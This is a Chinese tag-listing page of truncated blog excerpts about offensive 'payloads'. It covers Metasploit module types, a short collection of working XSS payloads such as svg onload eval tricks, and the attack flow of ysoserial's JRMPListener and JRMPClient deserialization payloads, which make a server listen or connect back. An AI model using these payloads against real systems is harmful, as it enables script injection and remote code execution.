首页 > TAG信息列表 > payloads
msf基础
msf中的模块: exploits,auxiliary,post,payloads,encoders,nops,evasionexploits:漏洞渗透模块。绝大多数人在发现漏洞之后,往往不知道接下来如何利用这个漏洞。漏洞模块本身就是解决这个文件的,每个模块对应一个漏洞,在发现目标的漏洞之后,无需知道漏洞是如何参生的,甚至无需掌握编程技术,XSS-Payloads集合
XSS-Payloads <!-- 仅适用于反射型XSS --!> <svg/onload=eval(name)> <!-- 如果你控制了 URL --> <svg/onload=eval(`'`+URL)> <!-- 如果你控制了名字,但是 unsafe-eval 没有启用 --> <svg/onload=location=name> <!-- 在 chrome 中,也适用于 innerHTML,即使在尚未ysoserial payloads/JRMPListener
payloads/JRMPListener JRMPListener的攻击流程: 1.生成payloads/JRMPListener发送给服务器,当服务器反序列化payloads/JRMPListener后,即会开启一个端口进行监听。 2.使用exploit/JRMPClient模块发送payload,服务器就会把payload进行反序列化,从而完成进行攻击。 直接通过ysoserial源ysoserial payloads/JRMPClient
ysoserial payloads/JRMPClient 环境:JDK8u102 payloads/JRMPClient可以配合exploit/JRMPListener模块来使用 1.在自己服务器上使用exploit/JRMPListener来开启监听 2.把payloads/JRMPClient发送给对方服务器,对方服务器反序列化后会反向连接我们的服务器,进行连接之间我们服务器会发